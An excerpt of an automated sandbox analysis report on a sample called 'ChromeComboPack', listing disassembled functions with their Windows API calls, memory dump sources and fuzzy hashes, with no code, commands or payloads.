                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 995526605-0
                                                                                                                                                                                                                                                • Opcode ID: 1d53d6d9a09d765e47c497b0d6d615a887cb0773de01ad6b7486372e5d5147f3
                                                                                                                                                                                                                                                • Instruction ID: 1be58e17697304be1e7ec1a18f1677d89ceda78f1e029023868a7a483afcf1d7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1d53d6d9a09d765e47c497b0d6d615a887cb0773de01ad6b7486372e5d5147f3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44218532A0C68292EB50BB55E44423EE3A5FFC57A0FA00375E66C83AE8DE7CD545C760

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF78C9B79C0: GetCurrentProcess.KERNEL32 ref: 00007FF78C9B79E0
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF78C9B79C0: OpenProcessToken.ADVAPI32 ref: 00007FF78C9B79F3
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF78C9B79C0: GetTokenInformation.KERNELBASE ref: 00007FF78C9B7A18
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF78C9B79C0: GetLastError.KERNEL32 ref: 00007FF78C9B7A22
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF78C9B79C0: GetTokenInformation.KERNELBASE ref: 00007FF78C9B7A62
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF78C9B79C0: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF78C9B7A7E
                                                                                                                                                                                                                                                  • Part of subcall function 00007FF78C9B79C0: CloseHandle.KERNEL32 ref: 00007FF78C9B7A96
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,00007FF78C9B3099), ref: 00007FF78C9B860C
                                                                                                                                                                                                                                                • LocalFree.KERNEL32 ref: 00007FF78C9B8615
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                                • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                                • Opcode ID: adc432e05c3c573e6ed13a0ece6c243bdb52cb2c57461f69188002d76d144bb7
                                                                                                                                                                                                                                                • Instruction ID: 90b2213a389da486e8ba2bd557e7a87e69efc654dff93a7fc381b31dc16107a1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: adc432e05c3c573e6ed13a0ece6c243bdb52cb2c57461f69188002d76d144bb7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D216231A08BD291F654BB10E5152FAA254FF88780FE540B1EA4D53B96DF3CD544C760
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(00000000,?,00007FF78C9B28EC,FFFFFFFF,00000000,00007FF78C9B3362), ref: 00007FF78C9B7382
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CreateDirectory
                                                                                                                                                                                                                                                • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                                • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                                • Opcode ID: 1595470b8fe5cf25a4bb7a8b08f8c3b2d301ea99817421a577ec3ebd14ff3d9b
                                                                                                                                                                                                                                                • Instruction ID: 7277feb95b588e5370a1d1c1753c8f0b46d530498ec681ef34c59bdb1872e3e1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1595470b8fe5cf25a4bb7a8b08f8c3b2d301ea99817421a577ec3ebd14ff3d9b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E131D821619AD5A5FA21A721E4507AAA258FF84BE0FA40370EE6D43BC9DE3CD245C720
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF78C9CDDEB), ref: 00007FF78C9CDF1C
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF78C9CDDEB), ref: 00007FF78C9CDFA7
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 953036326-0
                                                                                                                                                                                                                                                • Opcode ID: 72bdbade8f7f3669228eabd23d25320e309643dcfe9983c62a88d960f5e90d12
                                                                                                                                                                                                                                                • Instruction ID: 260afa7e48960f8a89ec21104a2c3b6dae6a81b7604675ec59ee929cb64c2932
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 72bdbade8f7f3669228eabd23d25320e309643dcfe9983c62a88d960f5e90d12
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB91E723E186D185F760EF2994442BDBBA4BB14BA8FB44179DE0E67694CF3CD441CB20
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4170891091-0
                                                                                                                                                                                                                                                • Opcode ID: 1e65149fea67db38c583cbef9075d189eb690351c339e1a8e9f7c5b338f54ae1
                                                                                                                                                                                                                                                • Instruction ID: 1e6aca9d31dbcaffff7d7bc2bb1b2d94fd6497035c34e034e11845dc46fbc3f3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1e65149fea67db38c583cbef9075d189eb690351c339e1a8e9f7c5b338f54ae1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A9510972F043518AEB18EF64E95D2BCB7A1BB10358FA011B6DE1D62AD9DF38B441C710
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2780335769-0
                                                                                                                                                                                                                                                • Opcode ID: d16365fe0b9d5c2c32275aae098c74abc859f9228c254a8bb51ec378e8daea97
                                                                                                                                                                                                                                                • Instruction ID: f5e540f50bd1ce3d0fdf2cd59fc1c10555637cd6c0ad1da1c3f14b8db7779fed
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d16365fe0b9d5c2c32275aae098c74abc859f9228c254a8bb51ec378e8daea97
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 92519E22E087818AFB14EF74D4803BDA3B1BB48B68FA08575DE0D57688DF38D451CB60
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1279662727-0
                                                                                                                                                                                                                                                • Opcode ID: 615a019661923f18b870c88d8c8c2e3de58a1ea0c3f5553ccf0a12bc46e2c946
                                                                                                                                                                                                                                                • Instruction ID: 640010d9698e0b894acb4c1ab6d703dbd45000bfd75e475feb5cbea76141f609
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 615a019661923f18b870c88d8c8c2e3de58a1ea0c3f5553ccf0a12bc46e2c946
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7541A162D187C283E714AB20D604379A260FFA4764F609375E65C03AD6DF6CE5E0CB20
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1703294689-0
                                                                                                                                                                                                                                                • Opcode ID: ad533715cf3b8ba661eb0a16145d01eebe53b03fcab9f2b2c8fa490b2e23822a
                                                                                                                                                                                                                                                • Instruction ID: 5766ae52dbb6069c32bbaf833f17f25cb2e15bc01a5ffd4c3a7d2e22e5c86ea3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad533715cf3b8ba661eb0a16145d01eebe53b03fcab9f2b2c8fa490b2e23822a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5ED05E11F086C642EA083B70588E1388215BF48730FA154B8C94F12397CD2CA44CC630
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3215553584-0
                                                                                                                                                                                                                                                • Opcode ID: eff41cba983b05e0f9e09f52185aba8178b112ae95ee52c2a1f9a5fdd57fcc68
                                                                                                                                                                                                                                                • Instruction ID: a8247caf0b27fbd40ebe5b41d3f513d1c10e1c8d9948db33c44b77448148996d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eff41cba983b05e0f9e09f52185aba8178b112ae95ee52c2a1f9a5fdd57fcc68
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C151F825B092E6D6EB28BE25940067AE291BF44BB4FB487B4DDAD077D9CE3CD401C720
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1236291503-0
                                                                                                                                                                                                                                                • Opcode ID: 0062f537d7c131bdaaf4aef5eb59421e6e9ee6bfc8727e8bca4d357a962c4ab6
                                                                                                                                                                                                                                                • Instruction ID: ba01d04a80f14cca2ab8f8674023c34e5d82474dd818d26631260e4f800d65a2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0062f537d7c131bdaaf4aef5eb59421e6e9ee6bfc8727e8bca4d357a962c4ab6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A315C21E0C5E3A2FA00BBA495193B9E391BF45794FE448B5EA4D572D7DE2CE404C770
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileHandleType
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3000768030-0
                                                                                                                                                                                                                                                • Opcode ID: 336ff322d096320c7609ad2a1ebfb1af701ecd8db59b0b6a36a9cc413741d25d
                                                                                                                                                                                                                                                • Instruction ID: f12fa97e5f48850a4e31fe17f53217299011a914c970cb8d8a3e4fec0e047180
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 336ff322d096320c7609ad2a1ebfb1af701ecd8db59b0b6a36a9cc413741d25d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B831A123A18B8681E730AB15858017CA658FB45BB4BB8137ADB7E177E0CF38E461C710
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF78C9CCFC0,?,?,?,?,?,00007FF78C9CD0C9), ref: 00007FF78C9CD020
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00007FF78C9CCFC0,?,?,?,?,?,00007FF78C9CD0C9), ref: 00007FF78C9CD02A
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2976181284-0
                                                                                                                                                                                                                                                • Opcode ID: c8d9032d6f18d1acbd55ff3d5784a6e8b9f1708e95d0104a6ada3112851001ef
                                                                                                                                                                                                                                                • Instruction ID: 7c51f5b9d983cce0f15e0c8b616673ff2c2bcadac8a64c4a1fe18a01b8e254c2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c8d9032d6f18d1acbd55ff3d5784a6e8b9f1708e95d0104a6ada3112851001ef
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 86119D62608B82C1DA20AB29E444069A365BB85BF4FA40371EE7D0B7E9CE78D052CB54
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF78C9C6795), ref: 00007FF78C9C68B3
                                                                                                                                                                                                                                                • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF78C9C6795), ref: 00007FF78C9C68C9
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1707611234-0
                                                                                                                                                                                                                                                • Opcode ID: 3a94ee504119d0a5112130d15b8324ff604b1d1e2425208ec9014ecb5db7cc3c
                                                                                                                                                                                                                                                • Instruction ID: 0aafb49e3fdef3d982eb27bccd0585a768a77ffa736f627a310676b6d71ca904
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a94ee504119d0a5112130d15b8324ff604b1d1e2425208ec9014ecb5db7cc3c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F911943260C69281EB54AB11A44113AF7A0FB85771FA0127AEA9E819E8EF6CD004CF20
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(?,?,?,00007FF78C9D3F32,?,?,?,00007FF78C9D3F6F,?,?,00000000,00007FF78C9D4435,?,?,?,00007FF78C9D4367), ref: 00007FF78C9CB41A
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF78C9D3F32,?,?,?,00007FF78C9D3F6F,?,?,00000000,00007FF78C9D4435,?,?,?,00007FF78C9D4367), ref: 00007FF78C9CB424
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000020.00000002.4355224974.00007FF78C9B1000.00000020.00000001.01000000.00000067.sdmp, Offset: 00007FF78C9B0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355172205.00007FF78C9B0000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355285040.00007FF78C9DD000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F0000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355340061.00007FF78C9F4000.00000004.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000020.00000002.4355447471.00007FF78C9F6000.00000002.00000001.01000000.00000067.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_32_2_7ff78c9b0000_ChromeComboPack.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 485612231-0
                                                                                                                                                                                                                                                • Opcode ID: 0e9bd81d70d272d571b15e7d509907a6bc8aa23799849ce19584cafaa201c9c5
                                                                                                                                                                                                                                                • Instruction ID: afb7d1edc9c500dc7fe44745d16d5583df0633f6df81cefe12b0e4f3d344b3a9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0e9bd81d70d272d571b15e7d509907a6bc8aa23799849ce19584cafaa201c9c5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8FE08C61F082C282FF087BF2984C078A1547F98761BE480B0EA0D97252DE2C6885CA30
